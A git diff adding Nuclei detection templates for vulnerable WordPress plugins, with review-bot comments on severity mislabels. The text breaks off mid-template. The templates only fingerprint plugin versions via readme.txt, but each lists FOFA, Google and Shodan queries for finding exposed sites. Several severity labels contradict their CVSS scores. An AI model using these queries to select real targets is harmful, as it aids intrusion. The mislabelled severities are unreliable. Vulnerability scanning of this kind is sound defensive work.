@@ -0,0 +1,59 @@ +id: CVE-2024-43271-b31214f9813d473f3cd67a61f9d552af + +info: + name: > + Woo Products Widgets For Elementor <= 2.0.0 - Authenticated (Contributor+) Local File Inclusion + author: topscoder + severity: low + description: > + The Widgets for WooCommerce Products on Elementor plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.0.0. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e8336c89-44ac-4e41-bc81-7dae9599c050?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-43271 + metadata: + fofa-query: "wp-content/plugins/woo-products-widgets-for-elementor/" + google-query: inurl:"/wp-content/plugins/woo-products-widgets-for-elementor/" + shodan-query: 'vuln:CVE-2024-43271' + tags: cve,wordpress,wp-plugin,woo-products-widgets-for-elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woo-products-widgets-for-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woo-products-widgets-for-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.0') \ No newline at end of file 
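Review bot: `severity: low` is plainly wrong for this template: the classification is `cvss-score: 8.8` with `C:H/I:H/A:H`, the title says Local File Inclusion and the description says "achieve code execution" — that is high on the CVSS 3.1 scale, and the `low` value in `tags` will cause the finding to be filtered out by anyone scanning with a medium-and-up severity filter. Change to `severity: high` and `tags: cve,wordpress,wp-plugin,woo-products-widgets-for-elementor,high`. The Contributor-level authentication needed to exploit is already reflected in `PR:L`, so it is not a reason to downgrade the template severity.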
diff --git a/poc/cve/CVE-2024-43272-4bb700a4fd663240eafaf4808a8dc083.yaml b/poc/cve/CVE-2024-43272-4bb700a4fd663240eafaf4808a8dc083.yaml new file mode 100644 index 0000000000..46e1e47527 --- /dev/null +++ b/poc/cve/CVE-2024-43272-4bb700a4fd663240eafaf4808a8dc083.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43272-4bb700a4fd663240eafaf4808a8dc083 + +info: + name: > + Icegram <= 3.1.24 - Missing Authorization + author: topscoder + severity: high + description: > + The Icegram plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the display_messages() function in versions up to, and including, 3.1.24. This makes it possible for unauthenticated attackers to preview campaigns + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/990d62fd-dc55-446e-b3ff-52c7c121aeb8?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-43272 + metadata: + fofa-query: "wp-content/plugins/icegram/" + google-query: inurl:"/wp-content/plugins/icegram/" + shodan-query: 'vuln:CVE-2024-43272' + tags: cve,wordpress,wp-plugin,icegram,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/icegram/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "icegram" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.1.24') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43273-731e5bc58cf2a73042628e403eeeb161.yaml b/poc/cve/CVE-2024-43273-731e5bc58cf2a73042628e403eeeb161.yaml new file mode 100644 index 0000000000..dc079b0ef9 --- /dev/null 
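Review bot: `severity: high` disagrees with the template's `cvss-score: 5.3` (`C:L/I:N/A:N`), which is medium on the CVSS 3.1 scale, and the description ("preview campaigns") describes an unauthenticated read of campaign content rather than a high-impact issue; `severity: medium` with the matching final `tags` value would be consistent. The description is also cut off after "preview campaigns" with no full stop and reads like a truncated advisory summary, so check the copy against the Wordfence entry. `display_messages()` is named but not exercised; the match is only the `readme.txt` version fingerprint.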
+++ b/poc/cve/CVE-2024-43273-731e5bc58cf2a73042628e403eeeb161.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43273-731e5bc58cf2a73042628e403eeeb161 + +info: + name: > + Icegram Collect – Easy Form, Lead Collection and Subscription plugin <= 1.3.14 - Missing Authorization + author: topscoder + severity: low + description: > + The Icegram Collect – Easy Form, Lead Collection and Subscription plugin plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the disconnect_campaignmonitor() function, along with a few others, in versions up to, and including, 1.3.14. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify plugin settings. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/821e763a-fe84-4471-99d0-515e036122c0?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43273 + metadata: + fofa-query: "wp-content/plugins/icegram-rainmaker/" + google-query: inurl:"/wp-content/plugins/icegram-rainmaker/" + shodan-query: 'vuln:CVE-2024-43273' + tags: cve,wordpress,wp-plugin,icegram-rainmaker,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/icegram-rainmaker/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "icegram-rainmaker" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.14') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-43276-8ffef4fa8d4aa2bb58db228915f672b3.yaml b/poc/cve/CVE-2024-43276-8ffef4fa8d4aa2bb58db228915f672b3.yaml new file mode 100644 index 0000000000..b45504476a --- /dev/null +++ b/poc/cve/CVE-2024-43276-8ffef4fa8d4aa2bb58db228915f672b3.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43276-8ffef4fa8d4aa2bb58db228915f672b3 + +info: + name: > + Child Theme Creator <= 1.5.4 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Child Theme Creator by Orbisius plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in all versions up to, and including, 1.5.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f25f358b-f9b7-4660-8dda-673023dc1967?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-43276 + metadata: + fofa-query: "wp-content/plugins/orbisius-child-theme-creator/" + google-query: inurl:"/wp-content/plugins/orbisius-child-theme-creator/" + shodan-query: 'vuln:CVE-2024-43276' + tags: cve,wordpress,wp-plugin,orbisius-child-theme-creator,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/orbisius-child-theme-creator/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "orbisius-child-theme-creator" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.5.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43278-fd5de4ff2b6a98fd4fced1b05d5ba695.yaml b/poc/cve/CVE-2024-43278-fd5de4ff2b6a98fd4fced1b05d5ba695.yaml new file mode 100644 index 0000000000..666f6e56f7 
--- /dev/null +++ b/poc/cve/CVE-2024-43278-fd5de4ff2b6a98fd4fced1b05d5ba695.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43278-fd5de4ff2b6a98fd4fced1b05d5ba695 + +info: + name: > + Meta Field Block <= 1.2.13 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Meta Field Block plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.2.13 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/faee30bb-ba6e-4d3e-8ca1-79fd676e68f5?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43278 + metadata: + fofa-query: "wp-content/plugins/display-a-meta-field-as-block/" + google-query: inurl:"/wp-content/plugins/display-a-meta-field-as-block/" + shodan-query: 'vuln:CVE-2024-43278' + tags: cve,wordpress,wp-plugin,display-a-meta-field-as-block,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/display-a-meta-field-as-block/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "display-a-meta-field-as-block" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.13') \ No newline at end of file 
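Review bot: `severity: low` disagrees with `cvss-score: 6.4`, which is Medium on the CVSS 3.1 qualitative scale that the template's own `cvss-metrics` vector uses, and the trailing `low` in `tags` repeats the mismatch; if the rating is meant to follow the score, the lines become `severity: medium` and `tags: cve,wordpress,wp-plugin,display-a-meta-field-as-block,medium`. The same disagreement appears in CVE-2024-43281 (L86–L87, 8.8, which is High), CVE-2024-43282 (L88, 7.2, High) and the 6.4 templates CVE-2024-43284 (L90), CVE-2024-43292 (L93), CVE-2024-43296 (L94), CVE-2024-43307 (L98), CVE-2024-43308 (L99) and CVE-2024-43309 (L101); CVE-2024-43273 on L79 (4.3) also sits in Medium. This matters operationally because nuclei output is commonly filtered by `severity` and tag, so an 8.8 local file inclusion labelled `low` is easy to drop from triage. Given how uniform the templates are, this is probably a severity mapping in the generator rather than something to fix one file at a time.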
diff --git a/poc/cve/CVE-2024-43279-4856fcf32dd027479e787b6af4d881c8.yaml b/poc/cve/CVE-2024-43279-4856fcf32dd027479e787b6af4d881c8.yaml new file mode 100644 index 0000000000..540c9e7c41 --- /dev/null +++ b/poc/cve/CVE-2024-43279-4856fcf32dd027479e787b6af4d881c8.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43279-4856fcf32dd027479e787b6af4d881c8 + +info: + name: > + Newsletters <= 4.9.8 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Newsletters plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in all versions up to, and including, 4.9.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/64de1220-52f5-46a9-b8ba-cf808d5d2e29?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-43279 + metadata: + fofa-query: "wp-content/plugins/newsletters-lite/" + google-query: inurl:"/wp-content/plugins/newsletters-lite/" + shodan-query: 'vuln:CVE-2024-43279' + tags: cve,wordpress,wp-plugin,newsletters-lite,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/newsletters-lite/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "newsletters-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.9.8') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-43280-db44f6b8fdcdf21a26dbde4aa2be30c5.yaml b/poc/cve/CVE-2024-43280-db44f6b8fdcdf21a26dbde4aa2be30c5.yaml new file mode 100644 index 0000000000..4be58a26c1 --- /dev/null +++ b/poc/cve/CVE-2024-43280-db44f6b8fdcdf21a26dbde4aa2be30c5.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43280-db44f6b8fdcdf21a26dbde4aa2be30c5 + +info: + name: > + Salon booking system <= 10.8.1 - Unauthenticated Open Redirect + author: topscoder + severity: medium + description: > + The Salon Booking System plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 10.8.1. This is due to insufficient validation on the redirect url supplied. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b8e64950-4f01-4391-8c65-2f25ff5bcc06?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-43280 + metadata: + fofa-query: "wp-content/plugins/salon-booking-system/" + google-query: inurl:"/wp-content/plugins/salon-booking-system/" + shodan-query: 'vuln:CVE-2024-43280' + tags: cve,wordpress,wp-plugin,salon-booking-system,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/salon-booking-system/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "salon-booking-system" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 10.8.1') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-43281-aaebfb81b7bf6e846c28d5dbeba71f10.yaml b/poc/cve/CVE-2024-43281-aaebfb81b7bf6e846c28d5dbeba71f10.yaml new file mode 100644 index 0000000000..dee8b7e53f --- /dev/null +++ b/poc/cve/CVE-2024-43281-aaebfb81b7bf6e846c28d5dbeba71f10.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43281-aaebfb81b7bf6e846c28d5dbeba71f10 + +info: + name: > + Void Elementor Post Grid Addon for Elementor Page builder <= 2.3 - Authenticated (Contributor+) Local File Inclusion + author: topscoder + severity: low + description: > + The Void Elementor Post Grid Addon for Elementor Page builder plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.3 via the 'display_type' attribute. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/15178478-5208-4869-a9f0-07e8e11ef0d5?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-43281 + metadata: + fofa-query: "wp-content/plugins/void-elementor-post-grid-addon-for-elementor-page-builder/" + google-query: inurl:"/wp-content/plugins/void-elementor-post-grid-addon-for-elementor-page-builder/" + shodan-query: 'vuln:CVE-2024-43281' + tags: cve,wordpress,wp-plugin,void-elementor-post-grid-addon-for-elementor-page-builder,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/void-elementor-post-grid-addon-for-elementor-page-builder/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 
"void-elementor-post-grid-addon-for-elementor-page-builder" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43282-4139e9028e5e4aaf19dfb7d072072d16.yaml b/poc/cve/CVE-2024-43282-4139e9028e5e4aaf19dfb7d072072d16.yaml new file mode 100644 index 0000000000..a5b08a7783 --- /dev/null +++ b/poc/cve/CVE-2024-43282-4139e9028e5e4aaf19dfb7d072072d16.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43282-4139e9028e5e4aaf19dfb7d072072d16 + +info: + name: > + Tutor LMS <= 2.7.2 - Authenticated (Administrator+) SQL Injection + author: topscoder + severity: low + description: > + The Tutor LMS plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 2.7.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/839b68e6-0462-4f88-ac13-ed4b69887d6b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2024-43282 + metadata: + fofa-query: "wp-content/plugins/tutor/" + google-query: inurl:"/wp-content/plugins/tutor/" + shodan-query: 'vuln:CVE-2024-43282' + tags: cve,wordpress,wp-plugin,tutor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/tutor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "tutor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.7.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43283-48bd98c02d59c632156d003781e3c65c.yaml b/poc/cve/CVE-2024-43283-48bd98c02d59c632156d003781e3c65c.yaml new file mode 100644 index 0000000000..065f1da8d4 --- /dev/null +++ b/poc/cve/CVE-2024-43283-48bd98c02d59c632156d003781e3c65c.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43283-48bd98c02d59c632156d003781e3c65c + +info: + name: > + Contest Gallery <= 23.1.2 - Unauthenticated Information Exposure + author: topscoder + severity: medium + description: > + The Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 23.1.2. This makes it possible for unauthenticated attackers to extract data like comment user IDs and IP Addresses. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f5e400f8-35b4-4be4-bb00-c59e14ddd57f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-43283 + metadata: + fofa-query: "wp-content/plugins/contest-gallery/" + google-query: inurl:"/wp-content/plugins/contest-gallery/" + shodan-query: 'vuln:CVE-2024-43283' + tags: cve,wordpress,wp-plugin,contest-gallery,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/contest-gallery/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "contest-gallery" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 23.1.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43284-8f3b74619f71500671f7b82070889832.yaml b/poc/cve/CVE-2024-43284-8f3b74619f71500671f7b82070889832.yaml new file mode 100644 index 0000000000..3c623c2ac8 --- /dev/null +++ b/poc/cve/CVE-2024-43284-8f3b74619f71500671f7b82070889832.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43284-8f3b74619f71500671f7b82070889832 + +info: + name: > + WP Travel Gutenberg Blocks <= 3.5.1 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The WP Travel Gutenberg Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 3.5.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/55fd9ca6-fe57-490d-bfde-492957035311?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43284 + metadata: + fofa-query: "wp-content/plugins/wp-travel-blocks/" + google-query: inurl:"/wp-content/plugins/wp-travel-blocks/" + shodan-query: 'vuln:CVE-2024-43284' + tags: cve,wordpress,wp-plugin,wp-travel-blocks,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-travel-blocks/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-travel-blocks" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.5.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43288-65d9db817865efa08483ff84c1215bb9.yaml b/poc/cve/CVE-2024-43288-65d9db817865efa08483ff84c1215bb9.yaml new file mode 100644 index 0000000000..7774d0c164 --- /dev/null 
+++ b/poc/cve/CVE-2024-43288-65d9db817865efa08483ff84c1215bb9.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43288-65d9db817865efa08483ff84c1215bb9 + +info: + name: > + wpForo Forum <= 2.3.4 - Authenticated (Subscriber+) Insecure Direct Object Reference + author: topscoder + severity: low + description: > + The wpForo Forum plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.3.4 due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform an unauthorized action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9cac5c66-d366-4a67-b29b-4efed67ab55b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43288 + metadata: + fofa-query: "wp-content/plugins/wpforo/" + google-query: inurl:"/wp-content/plugins/wpforo/" + shodan-query: 'vuln:CVE-2024-43288' + tags: cve,wordpress,wp-plugin,wpforo,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wpforo/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wpforo" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.3.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43289-fde4ffac9ff58bcd12d9665650ffc6f2.yaml b/poc/cve/CVE-2024-43289-fde4ffac9ff58bcd12d9665650ffc6f2.yaml new file mode 100644 index 0000000000..590e6d9248 --- /dev/null +++ b/poc/cve/CVE-2024-43289-fde4ffac9ff58bcd12d9665650ffc6f2.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43289-fde4ffac9ff58bcd12d9665650ffc6f2 + +info: + name: > + wpForo Forum <= 2.3.4 - Unauthenticated Sensitive Information Exposure + author: topscoder + severity: medium + description: > + The wpForo Forum plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.3.4. This makes it possible for unauthenticated attackers to extract sensitive user or configuration data. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/99650c4d-d8ef-4970-af65-b22b7fdf3543?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-43289 + metadata: + fofa-query: "wp-content/plugins/wpforo/" + google-query: inurl:"/wp-content/plugins/wpforo/" + shodan-query: 'vuln:CVE-2024-43289' + tags: cve,wordpress,wp-plugin,wpforo,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wpforo/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wpforo" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.3.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43292-b35a55b76b75876dc21a9c95e4bab296.yaml b/poc/cve/CVE-2024-43292-b35a55b76b75876dc21a9c95e4bab296.yaml new file mode 100644 index 0000000000..49408ebd91 --- /dev/null +++ b/poc/cve/CVE-2024-43292-b35a55b76b75876dc21a9c95e4bab296.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43292-b35a55b76b75876dc21a9c95e4bab296 + +info: + name: > + Envo's Elementor Templates & Widgets for WooCommerce <= 1.4.16 - Authenticated (Author+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Envo's Elementor Templates & Widgets for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.4.16 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7abb5103-7063-4a8d-8ca0-66074954acd5?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43292 + metadata: + fofa-query: "wp-content/plugins/envo-elementor-for-woocommerce/" + google-query: inurl:"/wp-content/plugins/envo-elementor-for-woocommerce/" + shodan-query: 'vuln:CVE-2024-43292' + tags: cve,wordpress,wp-plugin,envo-elementor-for-woocommerce,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/envo-elementor-for-woocommerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "envo-elementor-for-woocommerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.16') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-43296-0b5d50fa95a43be7a612dc20668129af.yaml b/poc/cve/CVE-2024-43296-0b5d50fa95a43be7a612dc20668129af.yaml new file mode 100644 index 0000000000..d0090514dc --- /dev/null +++ b/poc/cve/CVE-2024-43296-0b5d50fa95a43be7a612dc20668129af.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43296-0b5d50fa95a43be7a612dc20668129af + +info: + name: > + Flash & HTML5 Video <= 2.5.30 - Missing Authorization + author: topscoder + severity: low + description: > + The Flash & HTML5 Video plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several AJAX actions in versions up to, and including, 2.5.30. This makes it possible for authenticated attackers, with subscriber-level access and above, to update views, create thumbnails, and more. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/84ce21b9-91ac-4990-8665-69a1461147ab?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43296 + metadata: + fofa-query: "wp-content/plugins/html5-video-player/" + google-query: 